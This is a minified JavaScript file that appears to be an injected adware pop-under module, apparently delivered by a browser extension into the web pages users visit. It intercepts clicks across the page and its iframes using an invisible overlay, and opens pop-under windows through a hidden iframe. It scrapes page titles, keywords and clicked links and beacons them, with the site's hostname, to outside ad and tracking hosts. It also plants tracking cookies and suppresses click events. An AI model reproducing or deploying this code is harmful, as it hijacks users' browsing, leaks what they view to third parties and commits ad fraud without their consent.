_GPL.j(function(e,b,ja,B,n,g,l,xa,ya,sb,ka,u,cb,la,v,tb,p,za,Y,Aa,C,w,ub,x,db,U){function M(){Ba(h,Y,M);eb(function(a,c){d=a;Z||(Z=!0,fb(),gb(),ma(),Ca(h,Y,ma),Da=la(function(){36E5<+new n-Ea&&V(!1)},5E3))})}function ma(){Ea=+new n}function V(a){Z&&(e("iframe").off("mouseover",Fa),N.remove(),Z=!1,ja(Da),hb(),Ba(h,Y,ma),d=void 0,G=y="",a||Ca(h,Y,M),v(M,1E3*Math.max(H,z)))}function Ca(a,c,f){if(p[za])a[za](c,f,!1);else a.attachEvent("on"+c,f)}function gb(){aa=!0;b.ah&&b.ah(E,O);e("*").add(p).on(E,O);
Ga||(Ga=!0,e("*").add(p).on("mousedown mouseup click",Ha));e("iframe").each(function(a,c){try{e(c.contentWindow).on(E,O)}catch(f){}});Ia=la(function(){e("iframe").each(function(a,c){c[Ja]||(c[Ja]=1,e(c).mouseover(Fa))})},100);if(W)try{b.log("Attempting to pop from extension to: "+d);var a="ld893_";y&&(a+="_"+g(y),G&&(a+=","+G),a+="_");var a=a+("_"+F()),c=b.proto+b.baseCDN+"/pwn.html?u="+g(d)+"&n="+a+"&r=";"h"!=W||P?"w"!=W||P||(P=!0,na(p,"openThatTabBitch",{url:c,isUnder:!1,attr:"z7b85_91c4"}),v(function(){P=
!1},100)):(P=!0,na(h,"createNewTab",{url:c,focused:"true"}),na(h.documentElement,"createNewTab",{url:c,focused:"true"}),v(function(){P=!1},100));var f=la(function(){h.documentElement.getAttribute("z7b85_91c4")&&(ja(f),V(!0),Ka(),h.documentElement.removeAttribute("z7b85_91c4"))},50)}catch(q){}}function na(a,c,f){if(h.createEvent){var b=h.createEvent("CustomEvent");b.initCustomEvent(c,!1,!1,f);a.dispatchEvent(b)}else b=h.createEventObject(),b.detail=f,b.realType=c,a.fireEvent("ondataavailable",b)}function I(a){a=
ka.userAgent.match(cb(a+"[/ ](\\d+)","i"));return(a&&a[1])|0}function ib(){if(I("Chrome")){for(var a=0;a<ka.plugins.length;a++)if("Widevine Content Decryption Module"==ka.plugins[a].name)return!1;return!0}return!1}function fb(){N||(N=e('<div style="z-index:999999999999999;cursor:pointer;display:none;position:absolute;background:transparent;">&nbsp;</div>').appendTo("body"),N.mouseout(function(){N.hide()}))}function Fa(a){var c=e(a.target),f=c.offset();f.width=c.outerWidth();f.height=c.outerHeight();
f.display="block";N.css(f);a.stopPropagation()}function jb(a){if(d!=La){a=a.target||a.srcElement;for(var c="";a;){Q||(Q=a.tagName);if("A"==a.tagName&&a.href&&a.protocol.toLowerCase().match(/^http/)){c=a.protocol+"//"+a.host+a.pathname+a.search+a.hash;break}a=a.parentNode}if(!d)return!1;c&&(d+="&t="+g(c.substring(0,Math.max(0,1500-d.length))));d+="&rt="+(+new n-Ma);Q&&(d+="&data_tag="+g(Q));"/"!=l.pathname&&(d+="&mk="+g(b.B64.encode(oa().substring(0,Math.max(0,1500-d.length)))));d+=Na?"&data_sid="+
g(Na):""}b.log("Popping to: "+d);a="ld893_";y&&(a+="_"+g(y),G&&(a+=","+G),a+="_");c=a+="_"+F();R.parentNode||(Oa=Pa());if(a=Oa("",1749==r?c:"_blank"))a.name=c,0.02>Math.random()?(c=""+d,-1<d.indexOf(ba)&&(c="http://"+ba+"/pclk?c="+g(y)+"&crl="+g(d)),a.location.href=c):a.location.href=d;return a}function oa(){function a(a){return a.toLowerCase().replace(/[.,!?]/g," ").split(" ")}var c=[];e("title").length&&(c=c.concat(a(e("title").text())));e('meta[property="og:title"],meta[property="og:description"],meta[name="description"],meta[name="keywords"]').each(function(){var f=
e.trim(e(this).attr("content"));f&&f.match(/^\s*[a-zA-Z0-9]/)&&(c=c.concat(a(f)))});return e.trim(function(a){var c=[];e.each(a,function(a,b){-1==e.inArray(b,c)&&c.push(b)});return c}(c).join(",").replace(/([,]+)/g,",").replace(/\s+/g," "))}function Qa(a,c){a=(a||l.href).substr(0,1500);var f="/"!=l.pathname?oa():"";a=a.replace(/:/g,"%3A");var f=f.replace(/:/g,"%3A").substring(0,Math.max(0,1500-a.length)),q=b.getSubId?"&subid="+b.getSubId(ca):"",f=g(b.B64.encode(a+"::z-"+r+"-"+Ra+"::"+f)),d="&cb="+
(c||pa),d=d+("&data_fr="+(Sa(A)?"false":"true")),d=d+("&data_proto="+g(l.protocol));return b.proto+ba+"/pops?c="+f+"&a=1&ch="+g(X)+q+d}function Ba(a,c,b){if(p[Aa])a[Aa](c,b,!1);else a.detachEvent("on"+c,b)}function hb(){aa=!1;b.rh&&b.rh(E,O);e("*").add(p).off(E,O);e("iframe").each(function(a,c){try{e(c.contentWindow).off(E,O)}catch(b){}});ja(Ia)}function kb(a){a=a||p.event||{};if(W&&h.documentElement.getAttribute("z7b85_91c4"))return!0;for(a=a.target||a.srcElement;a;){if(a["91c4"])return!0;a=a.parentNode}return!1}
function lb(a,c){var b=0,q;c=c||[];for(var g=Math.random(),d=0;d<c.length;d++)if(b+=c[d][1],g<b&&!q&&(q=c[d][0]),c[d][0]==a){q=a;break}return q||c[0][0]}function S(a,c){a=u(a,10);isNaN(a)&&(a=u(da&&da.getItem(c)||b.gc(c,10),10)||0);return a}function Sa(a){return(new n(1E3*(a||0))).toDateString()==(new n).toDateString()}function ea(){A|=0;s|=0;J|=0;var a=F(),c=s&&!Sa(A);c&&(s=0,t.set(x,s));var b=!K||a-A>=H&&s<K,a=a-J>=z;return!m&&c||b&&a}function O(a){a=a||p.event;if(!kb(a)){var c=aa&&mb(),f=c&&jb(a);
if(f&&!f.closed)return V(!0),Ka(),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_success&d="+g(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random(),fa&&B(fa),ga&&B(ga),qa=!0,Ha(a);f&&f.closed?ga||(ga=v(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popclose&u="+g(d)+"&location="+g(l.hostname)+"&pid="+r+"&tag="+g(Q||"")+"&r="+999999999*Math.random()},1E3)):c&&(fa||(fa=v(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfail&u="+g(d)+
"&location="+g(l.hostname)+"&pid="+r+"&tag="+g(Q||"")+"&r="+999999999*Math.random()},1E3)))}}function mb(){if(!t.swf)return!0;A=S(t.get(C),C);316808>Ta.score&&(s=S(t.get(x),x));var a=Ua(t.get(w));J=S(a[T],w);return ea()}function F(){return xa(new n/1E3)}function Va(a,c,b){t.set(a,b);b=F();da&&da.setItem(a,b);c=u(c,10);var q=new n;q.setSeconds(q.getSeconds()+c);h.cookie=a+"="+b+";expires="+q.toUTCString()+";path=/;domain="+T}function Ka(){var a=F();Va(C,H,a);t.set(db,a);A=a;t.set(x,++s);z&&Va(w,z,
ha+(ha&&",")+T+":"+a)}function Ua(a){var b={},f=F(),q=[];a=(a||"").split(",");if(a.length){for(var d=0;d<a.length;++d){var g=a[d].split(":"),e=u(g[1],10);f-e<z&&(b[g[0]]=e,q.push(g[0]+":"+e))}ha=q.join(",");t.set(w,ha)}return b}function ra(){return ea()||m?1:F()-(u(J,10)||0)<z?Infinity:s>=K?"US"==b.vars.cid?149058:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?88620:59858:"US"==b.vars.cid?47432:-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?59858:49928}function nb(a){"US"==b.vars.cid?sa(a,47432,
149058):-1<["CA","GB","AU","FR","IT"].indexOf(b.vars.cid)?sa(a,59858,88620):sa(a,49928,59858);return ea()}function sa(a,b,f){a>=b&&(H=0,a>=f&&s>=K&&(s=ya(0,K-1)))}function Wa(a){B(ia);if(!m&&1735!=r){var b=ra(),f="http://clkmon.com/adServe/banners?pid=14442&cid="+Ra+"&action=r&q=",d="/"!=l.pathname?oa():"",f=f+g(d.substring(0,Math.max(0,1500-f.length)));p[pa]({url:f,score:b});(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfallback&reason="+g(a)+"&pid="+r+"&u="+g(l.hostname)+"&r="+999999999*
Math.random()}}function eb(a){!function f(){t.get(["frt","_GPL_oo_z7b85",C,w,x,U],function(d){if(d.v.frt){if("1750"==r){var e=u(d.v._GPL_oo_z7b85,10)||0;if(86400>xa(new n/1E3)-e)return}Xa.getAttribute("data-openThatTabBitch")&&"t3"==b.vars.wptg&&(e=["wp_t3_c","wp_t3_t"],k=d.v[U],k&&-1!=e.indexOf(k)||(k=e[Math.floor(Math.random()*e.length)],t.set(U,k)),"wp_t3_t"==k&&(W="w"));k||(k=d.v[U],k=lb(k,[["20150720_c",0.85],["20150720_t_95",0.01],["20150720_t_90",0.01],["20150720_t_85",0.01],["20150720_t_80",
0.01],["20150720_t_75",0.01],["20150720_t_70",0.01],["20150720_t_65",0.01],["20150720_t_60",0.01],["20150720_t_55",0.01],["20150720_t_50",0.01],["20150720_t_45",0.01],["20150720_t_40",0.01],["20150720_t_35",0.01],["20150720_t_30",0.01],["20150720_t_25",0.01]]),t.set(U,k));Ya||(Ya=!0,b.pc(function(){Za?Za=!1:aa||(ta=!1,V(),M())}));p[pa]=function(b){ob(b,a)};e=F();A=S(d.v[C],C);s=S(d.v[x],x);d=Ua(d.v[w]);J=S(d[T],w);if(ea()){d=ra();ua=+new n;var l=h.createElement("script");l.src=Qa()+"&ms="+d+"&r="+
e;l.onerror=function(){Wa("error")};Xa.appendChild(l);(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_req&ms="+d+"&d="+g(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random();B(ia);ia=v(function(){Wa("time")},15E3)}else d=ra(),b.log("minScoreNeeded: "+d),Infinity>d&&!ta&&!m?(ua=+new n,b.insertJS(Qa()+"&ms="+d+"&r="+e),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_req&ms="+d+"&d="+g(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*
Math.random(),ta=!0):-1<k.indexOf("20150720_t_")&&va(),B(wa),wa=v(f,1E3*(5+ya(e,A+H,J+z)-e))}})}()}function Pa(){R=h.createElement("iframe");R.style.display="none";R.style.visibility="hidden";h.body.appendChild(R);return R.contentWindow.open}function Ha(a){if(qa)return a.cancelBubble=!0,a.stopPropagation&&a.stopPropagation(),a.stopImmediatePropagation&&a.stopImmediatePropagation(),a.preventDefault&&a.preventDefault(),v(function(){qa=!1},100),!1}function va(){b.insertJS(b.proto+b.baseCDN+"/items/z7b85/js/z7b85bm.js")}
function ob(a,c){B(ia);var d=+new n-ua;G=y="";if(a){a.crid&&(G=a.crid);a.cid&&(y=a.cid,a.url||(a.url="http://"+ba+"/click?c="+g(y),a.url+=b.getSubId?"&subid="+b.getSubId(ca):"",a.url+=k?"&data_test="+g(k):"",a.url+="&data_fb="+(ib()?"yes":"no"),a.url+="&data_rtt="+d,a.url+="&data_proto="+g(l.protocol),a.url+="&data_ic="+($a?"true":"false"),a.url+="&data_ss="+(screen.availHeight||0)+"x"+(screen.availWidth||0)));m&&!a.cid&&(a.url=La,a.cid="xr");var d=u(a.score,10),e=!a.mp;if(!e&&k&&-1<k.indexOf("20150720_t_")){var h=
u(k.split("_")[2]);if(100*parseFloat(a.mp)>=h){e=!0;va();return}}m||e&&0<d&&nb(d)?(Ma=+new n,B(wa),a.url&&a.expires&&(B(ab),ab=v(function(){V(!0);M()},1E3*u(a.expires,10))),Ta={score:d,now:new n/1},c(a.url,d),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_bid&d="+g(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random()):((new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=p_nobid&d="+g(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random(),
-1<k.indexOf("20150720_t_")&&va())}}var t=b.items.e6a00,h=p.document,Xa=h.body,da=p.localStorage,pb=I("chrome"),qb=I("firefox");I("opera");var rb=I("safari");I("webkit");var X=b.item_vars["22555_ch"]||b.item_vars.ch||"",H,A,J,L=b.dt(),L=L&&L.inherited&&L.inherited.t||[],m="x"==X||-1<L.indexOf("adult")||0==L.length&&0<e('meta[content="RTA-5042-1996-1400-1577-RTA"]').length;m&&(-1==L.indexOf("adult_block")?X="x":(X="x-issue",m=!1));var z,ca="z7b85",ba=b.gsd&&b.gsd(ca)||"s.hklmm.com",Z=!1,Da,Ea,aa=!1,
T=b.gd(),d,Ma=0,ua=0,ab,ha="",s=0,K,Ta={},y="",G="",wa,ta=!1,k,fa,ga,ia,Q,E="click";if(pb||rb)E="mousedown";else if(qb||h.all||I("trident"))E="mouseup";var bb=b.zoneid(ca,!0).split("_"),Ra=bb[0],r=bb[1]||b.vars.pid,Na=b.vars.systemid,La="http://secure.xsrving.com/display?size=800x600&ch="+g(X)+"&referer="+g(T),W=!1,P=!1,pa=b.rs(20),N,Ja=b.rs(12),Ia,$a=function(){try{return p[(p.btoa||function(a){return a})(l.hostname+"::"+(new n).toDateString())]===l.protocol}catch(a){return!1}}(),Ya=!1,Za=!0,R,Oa=
Pa(),qa=!1,Ga=!1;1797==r&&"GB"==b.vars.cid||"facebook.com"==T||($a?(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=idlecrawler&d="+g(b.gd())+"&xr="+(m?"1":"0")+"&cid="+b.vars.cid+"&pid="+r+"&r="+999999999*Math.random():(m?(K=H=0,z=180,C+="_xr",w+="_xr",x+="_xr"):(H=360,K=4,z=360),M()))},_GPL,clearInterval,clearTimeout,Date,encodeURIComponent,location,Math.floor,Math.max,Math.random,navigator,parseInt,RegExp,setInterval,setTimeout,void 0,window,"addEventListener","mousemove","removeEventListener",
"ld893_pop_g","ld893_pop_s","ld893_s","ld893_pop_gs","ld893_spopd","z7b85_test");
